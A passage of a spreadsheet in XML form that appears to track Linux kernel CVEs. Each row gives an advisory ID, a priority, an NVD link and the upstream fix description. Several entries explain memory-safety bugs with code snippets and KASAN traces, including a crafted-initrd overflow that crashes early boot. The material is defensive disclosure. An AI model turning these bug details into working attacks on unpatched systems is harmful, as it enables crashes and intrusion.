    cpufreq_policy_alloc()
      alloc_cpumask_var(&amp;policy-&gt;cpus)    /* bitmap is uninitialized */
      kobject_init_and_add()              /* policy%u/ appears in sysfs */
    cpufreq_policy_online()
      cpumask_copy(policy-&gt;cpus, cpumask_of(cpu))  /* first valid value */
This leaves a window in which the sysfs attributes are already reachable
while policy-&gt;cpus is still garbage. show()/store() gate on
policy_is_inactive(), i.e. cpumask_empty(policy-&gt;cpus), so a non-zero
bitmap makes them run the attribute callbacks on a policy that is not
initialized yet.
Fix this by using zalloc_cpumask_var() for policy-&gt;cpus.</t>
        </is>
      </c>
      <c r="T555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97905</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97906</t>
        </is>
      </c>
      <c r="D556" s="5" t="inlineStr"/>
      <c r="E556" s="5" t="inlineStr"/>
      <c r="F556" s="5" t="inlineStr"/>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="inlineStr"/>
      <c r="I556" s="5" t="inlineStr"/>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr"/>
      <c r="L556" s="5" t="inlineStr"/>
      <c r="M556" s="5" t="inlineStr"/>
      <c r="N556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O556" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q556" s="5" t="inlineStr"/>
      <c r="R556" s="5" t="inlineStr"/>
      <c r="S556" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bootconfig: Fix integer overflow in initrd size check
Sashiko reported that in get_boot_config_from_initrd(), a crafted initrd
with a huge bootconfig size (such as 0xFFFFFFFF) can cause the pointer
arithmetic:
    data = ((void *)hdr) - size;
to wrap around on 32-bit systems (or when pointer subtraction overflows).
Because data wraps around, the subsequent bounds check:
    if ((unsigned long)data &lt; initrd_start)
evaluates to false, bypassing the check. The kernel then calls
xbc_calc_checksum(data, size), which attempts to read 4GB of memory,
hitting unmapped pages and triggering a fatal kernel page fault during
early boot. Furthermore, on 64-bit systems with an initrd &gt; 4.29 GB, an
unbounded 32-bit size can similarly bypass the initrd_start check.
Fix this by:
1. Ensuring the initrd is at least large enough to contain the bootconfig
   footer and verifying hdr is within the initrd bounds.
2. Checking that size does not exceed XBC_DATA_MAX and does not exceed
   the available space between initrd_start and hdr before performing
   pointer subtraction.</t>
        </is>
      </c>
      <c r="T556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97906</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97907</t>
        </is>
      </c>
      <c r="D557" s="5" t="inlineStr"/>
      <c r="E557" s="5" t="inlineStr"/>
      <c r="F557" s="5" t="inlineStr"/>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="inlineStr"/>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr"/>
      <c r="L557" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q557" s="5" t="inlineStr"/>
      <c r="R557" s="5" t="inlineStr"/>
      <c r="S557" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btrtl: Don't leak return code when parsing firmware format v2
When key_id from chip is zero, rtlbt_parse_firmware_v2() intentionally
ignores all security headers. However, the implementation simply breaks
from a switch statement and leaks uninitialized return code `rc' (if the
first section is a security one) or the previous section's `rc'.
Fix it by really skipping a loop with `continue'. For consistency and
readability, also do the same for the default case.</t>
        </is>
      </c>
      <c r="T557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97907</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97908</t>
        </is>
      </c>
      <c r="D558" s="5" t="inlineStr"/>
      <c r="E558" s="5" t="inlineStr"/>
      <c r="F558" s="5" t="inlineStr"/>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="inlineStr"/>
      <c r="I558" s="5" t="inlineStr"/>
      <c r="J558" s="5" t="inlineStr"/>
      <c r="K558" s="5" t="inlineStr"/>
      <c r="L558" s="5" t="inlineStr"/>
      <c r="M558" s="5" t="inlineStr"/>
      <c r="N558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O558" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q558" s="5" t="inlineStr"/>
      <c r="R558" s="5" t="inlineStr"/>
      <c r="S558" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btqcomsmd: destroy RPMsg endpoints before freeing hci_dev
The command and ACL RPMsg endpoints store struct btqcomsmd as their
callback private data. The receive callbacks dereference btq-&gt;hdev
without taking an hci_dev reference.
The current teardown order frees the hci_dev before destroying the RPMsg
endpoints in both the hci_register_dev() error path and the driver remove
path. If WCNSS delivers data in that window, the endpoint callback can
run with an already freed hci_dev and pass it to the Bluetooth core.
For qcom_smd endpoints, rpmsg_destroy_ept() closes the channel and clears
the callback under the channel recv_lock. The receive path holds the same
lock while invoking the callback, so destroying the endpoints first both
prevents new callbacks and serializes with any callback already running.
Destroy the command and ACL endpoints before hci_free_dev(). Keep
hci_unregister_dev() first during remove so the HCI core stops issuing
operations before the transport endpoints are shut down. In the full
registration-error cleanup path, return directly after freeing the hci_dev
to avoid falling through to the partial-construction labels and destroying
the endpoints twice.</t>
        </is>
      </c>
      <c r="T558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97908</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97909</t>
        </is>
      </c>
      <c r="D559" s="5" t="inlineStr"/>
      <c r="E559" s="5" t="inlineStr"/>
      <c r="F559" s="5" t="inlineStr"/>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="inlineStr"/>
      <c r="I559" s="5" t="inlineStr"/>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr"/>
      <c r="L559" s="5" t="inlineStr"/>
      <c r="M559" s="5" t="inlineStr"/>
      <c r="N559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O559" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q559" s="5" t="inlineStr"/>
      <c r="R559" s="5" t="inlineStr"/>
      <c r="S559" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: sti: initialize IRQ lock before requesting IRQ
uni_reader_init() registers the shared IRQ before initializing
reader-&gt;irq_lock. A pending interrupt can invoke the handler while the
lock is still uninitialized.
Initialize the lock before registering the IRQ so the interrupt path
always sees valid lock state.</t>
        </is>
      </c>
      <c r="T559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97909</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97912</t>
        </is>
      </c>
      <c r="D560" s="5" t="inlineStr"/>
      <c r="E560" s="5" t="inlineStr"/>
      <c r="F560" s="5" t="inlineStr"/>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="inlineStr"/>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr"/>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q560" s="5" t="inlineStr"/>
      <c r="R560" s="5" t="inlineStr"/>
      <c r="S560" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel: ethosu: Ensure SRAM size is 0 on mapping failure
On a mapping failure of the SRAM, the SRAM size is left as non-zero. The
probe will succeed as the error return is not checked since having SRAM is
not a hard requirement. The non-zero size allows jobs to access SRAM which
is left pointing to physical base address 0x0.</t>
        </is>
      </c>
      <c r="T560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97912</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97913</t>
        </is>
      </c>
      <c r="D561" s="5" t="inlineStr"/>
      <c r="E561" s="5" t="inlineStr"/>
      <c r="F561" s="5" t="inlineStr"/>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="inlineStr"/>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr"/>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q561" s="5" t="inlineStr"/>
      <c r="R561" s="5" t="inlineStr"/>
      <c r="S561" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel: ethosu: Ensure cmd stream ends with a stop op
While the QSIZE register setting should prevent an out of bounds access
of the command stream, it is not clear whether the h/w generates an
interrupt in this case as is required (to prevent a timeout). As a stop op
is expected end of the command stream, let's just ensure it is present. A
stop op in the middle of the command stream also makes no sense.</t>
        </is>
      </c>
      <c r="T561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97913</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97914</t>
        </is>
      </c>
      <c r="D562" s="5" t="inlineStr"/>
      <c r="E562" s="5" t="inlineStr"/>
      <c r="F562" s="5" t="inlineStr"/>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="inlineStr"/>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K562" s="5" t="inlineStr"/>
      <c r="L562" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q562" s="5" t="inlineStr"/>
      <c r="R562" s="5" t="inlineStr"/>
      <c r="S562" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel: ethosu: Fix ethosu_job_open() return value
A WARN_ON() returns a 0 or 1, not the original negative errno. Just drop
the WARN_ON() as the FD open will pass the return code to userspace and
there's only one possible source of the error (drm_sched_entity_init()).</t>
        </is>
      </c>
      <c r="T562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97914</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97915</t>
        </is>
      </c>
      <c r="D563" s="5" t="inlineStr"/>
      <c r="E563" s="5" t="inlineStr"/>
      <c r="F563" s="5" t="inlineStr"/>
      <c r="G563" s="5" t="inlineStr"/>
      <c r="H563" s="5" t="inlineStr"/>
      <c r="I563" s="5" t="inlineStr"/>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr"/>
      <c r="L563" s="5" t="inlineStr"/>
      <c r="M563" s="5" t="inlineStr"/>
      <c r="N563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O563" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q563" s="5" t="inlineStr"/>
      <c r="R563" s="5" t="inlineStr"/>
      <c r="S563" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/ivpu: Limit firmware log name prints to field size
The name in struct vpu_tracing_buffer_header is a fixed-size array
populated by the NPU firmware. It is expected to be NUL-terminated,
but nothing on the host side enforces this, so printing it with an
unbounded string conversion would read past the field if the
terminator is ever missing and expose adjacent bytes of the shared
tracing BO through dmesg and the debugfs FW log output.
Print at most as many characters as the name field holds, so the output
never runs past it even if the string is not NUL-terminated.</t>
        </is>
      </c>
      <c r="T563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97915</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97916</t>
        </is>
      </c>
      <c r="D564" s="5" t="inlineStr"/>
      <c r="E564" s="5" t="inlineStr"/>
      <c r="F564" s="5" t="inlineStr"/>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="inlineStr"/>
      <c r="I564" s="5" t="inlineStr"/>
      <c r="J564" s="5" t="inlineStr"/>
      <c r="K564" s="5" t="inlineStr"/>
      <c r="L564" s="5" t="inlineStr"/>
      <c r="M564" s="5" t="inlineStr"/>
      <c r="N564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O564" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q564" s="5" t="inlineStr"/>
      <c r="R564" s="5" t="inlineStr"/>
      <c r="S564" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/ivpu: Validate firmware log buffer metadata
The tracing log headers parsed by fw_log_print_buffer() reside in
DMA-shared BOs that the NPU firmware can write to.
fw_log_from_bo() validated log-&gt;header_size and log-&gt;size, but
fw_log_print_buffer() re-read those same fields from shared memory
afterwards, allowing a TOCTOU where firmware changes them between the
check and the use, and making the host dereference out-of-bounds
addresses while printing logs.
Snapshot the validated values once with READ_ONCE() and pass them down
explicitly in a new struct ivpu_fw_log_desc instead of re-reading them
from the shared struct.</t>
        </is>
      </c>
      <c r="T564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97916</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97917</t>
        </is>
      </c>
      <c r="D565" s="5" t="inlineStr"/>
      <c r="E565" s="5" t="inlineStr"/>
      <c r="F565" s="5" t="inlineStr"/>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="inlineStr"/>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr"/>
      <c r="L565" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q565" s="5" t="inlineStr"/>
      <c r="R565" s="5" t="inlineStr"/>
      <c r="S565" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/ivpu: Validate full buffer range in ivpu_to_cpu_addr
Add a size parameter to ivpu_to_cpu_addr() and validate that the
whole [vpu_addr, vpu_addr + size) range stays within the BO.</t>
        </is>
      </c>
      <c r="T565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97917</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97918</t>
        </is>
      </c>
      <c r="D566" s="5" t="inlineStr"/>
      <c r="E566" s="5" t="inlineStr"/>
      <c r="F566" s="5" t="inlineStr"/>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="inlineStr"/>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q566" s="5" t="inlineStr"/>
      <c r="R566" s="5" t="inlineStr"/>
      <c r="S566" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Undo the registration when enabling the histogram trigger fails
Commit 6f86bdeab633 ("tracing: Fix bad hist from corrupting named_triggers
list") described how a trigger that is registered but not on file-&gt;triggers
ends up freed while still on the global named_triggers list, and moved the
registration down so that hist_trigger_enable() follows it immediately. One
path still gets there. hist_trigger_enable() adds the trigger and takes it
straight back out when the event cannot be enabled:
	list_add_tail_rcu(&amp;data-&gt;list, &amp;file-&gt;triggers);
	update_cond_flag(file);
	if (trace_event_trigger_enable_disable(file, 1) &lt; 0) {
		list_del_rcu(&amp;data-&gt;list);
		update_cond_flag(file);
		ret--;
	}
so the list walk in hist_unregister_trigger() matches nothing, test stays
NULL, and the -&gt;free() that would call del_named_trigger() is skipped.
out_unreg falls through to out_free, which frees the trigger anyway:
 BUG: KASAN: slab-use-after-free in find_named_trigger+0xac/0xc0
 Read of size 8 at addr ffff8880091d3160 by task init/1
  find_named_trigger+0xac/0xc0
  hist_register_trigger+0xc1/0xa00
  event_hist_trigger_parse+0x3146/0x6af0
  event_trigger_write+0xce/0x160
 Freed by task 69:
  kfree+0x154/0x420
  trigger_kthread_fn+0xfd/0x160
Leave the trigger where hist_unregister_trigger() can find it and let that
undo the registration, which is the only code that knows all of what
cmd_ops-&gt;init() took: the named list entry, the hist_pad reference, the
reference on the trigger a named histogram is shared with, and the copied
cmd_ops. It also pairs the failed trace_event_trigger_enable_disable(),
whose sm_ref and buffered event reference are otherwise left behind.
Since -&gt;free() releases trigger_data and, for a trigger that does not share
its histogram, hist_data with it, out_unreg can no longer fall through to
out_free. For a trigger that does share, hist_register_trigger() has
already destroyed the caller's hist_data, so the fall-through was reading
freed memory there as well.
Move the enable_timestamps check in hist_unregister_trigger() above the
-&gt;free() call for the same reason: hist_data does not outlive it once the
trigger being removed is the one that owns it.</t>
        </is>
      </c>
      <c r="T566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97918</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97919</t>
        </is>
      </c>
      <c r="D567" s="5" t="inlineStr"/>
      <c r="E567" s="5" t="inlineStr"/>
      <c r="F567" s="5" t="inlineStr"/>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="inlineStr"/>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q567" s="5" t="inlineStr"/>
      <c r="R567" s="5" t="inlineStr"/>
      <c r="S567" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Take the reference before publishing the named histogram trigger
event_hist_trigger_named_init() puts the trigger on the global
named_triggers list and only then takes the reference on the trigger it
shares its histogram with:
	data-&gt;ref++;
	save_named_trigger(data-&gt;named_data-&gt;name, data);
	ret = event_hist_trigger_init(data-&gt;named_data);
	if (ret &lt; 0) {
		kfree(data-&gt;cmd_ops);
		data-&gt;cmd_ops = &amp;trigger_hist_cmd;
	}
	return ret;
event_hist_trigger_init() fails when alloc_hist_pad() cannot allocate, and
nothing takes the trigger back off the list on the way out.
event_hist_trigger_parse() frees it, and the next lookup by name reads the
freed object:
 BUG: KASAN: slab-use-after-free in find_named_trigger+0xac/0xc0
 Read of size 8 at addr ffff888009346860 by task init/1
  find_named_trigger+0xac/0xc0
  hist_register_trigger+0xc1/0xa00
  event_hist_trigger_parse+0x3146/0x6af0
  event_trigger_write+0xce/0x160
 Freed by task 67:
  kfree+0x154/0x420
  trigger_kthread_fn+0xfd/0x160
Do the reference first and publish once it has succeeded, so that nothing
which can fail runs after the trigger becomes findable.</t>
        </is>
      </c>
      <c r="T567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97919</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97920</t>
        </is>
      </c>
      <c r="D568" s="5" t="inlineStr"/>
      <c r="E568" s="5" t="inlineStr"/>
      <c r="F568" s="5" t="inlineStr"/>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="inlineStr"/>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q568" s="5" t="inlineStr"/>
      <c r="R568" s="5" t="inlineStr"/>
      <c r="S568" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Keep the entry count when the histogram stats allocation fails
print_entries() uses n_entries both as the number of sort entries and as
its own return value, so the -ENOMEM it stores when the stats allocation
fails overwrites the count that the cleanup still needs:
	n_entries = tracing_map_sort_entries(map, ...);
	if (n_entries &lt; 0)
		return n_entries;
	...
			if (!stats) {
				n_entries = -ENOMEM;
				goto out;
			}
	...
 out:
	tracing_map_destroy_sort_entries(sort_entries, n_entries);
tracing_map_destroy_sort_entries() takes an unsigned int and loops up to
it, so -ENOMEM arrives as 4294967284. It walks an array of at most
map-&gt;max_elts pointers and calls destroy_sort_entry(), which dereferences
and frees, on whatever lies past the end.
Reading the hist file of a trigger with a .percent value, with that
allocation forced to fail:
  BUG: KASAN: vmalloc-out-of-bounds in tracing_map_destroy_sort_entries+0xa0/0xb0
  Read of size 8 at addr ffffc90000045000 by task init/1
   tracing_map_destroy_sort_entries+0xa0/0xb0
   hist_show+0x6f7/0x1df0
   seq_read_iter+0x2b8/0x1190
   vfs_read+0x176/0xa40
  The buggy address belongs to a 4-page vmalloc region starting at
  ffffc90000041000 allocated at tracing_map_sort_entries+0x5c/0xd50
A few pages further the fault is fatal. The registers at the oops confirm
the bound: the loop's end pointer less the array start, over the pointer
size, is 4294967284.
Return the error in a separate variable and leave n_entries holding the
count, the way tracing_map_sort_entries() does on its own error path.
The stats block is only entered for a value carrying .percent or .graph,
which __create_val_field() has rejected since v6.3, so this cannot be
reached in mainline as it stands. It becomes reachable again with
"tracing: hist: let values keep the percent and graph modifiers", so it
should be applied first.</t>
        </is>
      </c>
      <c r="T568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97920</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97921</t>
        </is>
      </c>
      <c r="D569" s="5" t="inlineStr"/>
      <c r="E569" s="5" t="inlineStr"/>
      <c r="F569" s="5" t="inlineStr"/>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="inlineStr"/>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q569" s="5" t="inlineStr"/>
      <c r="R569" s="5" t="inlineStr"/>
      <c r="S569" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Free histogram the field rejected for a bad modifier
Writing a hist trigger whose value or variable carries a modifier that is
not allowed there leaks the fields that were built for it.
__create_val_field() takes the field from parse_expr() and stores it in
hist_data-&gt;fields[] only after the modifier checks have run:
	hist_field = parse_expr(hist_data, file, field_str, flags, var_name,
				&amp;n_subexprs);
	...
	if (hist_field-&gt;flags &amp; HIST_FIELD_FL_VAR) {
		if (hist_field-&gt;flags &amp; (...))
			goto err;
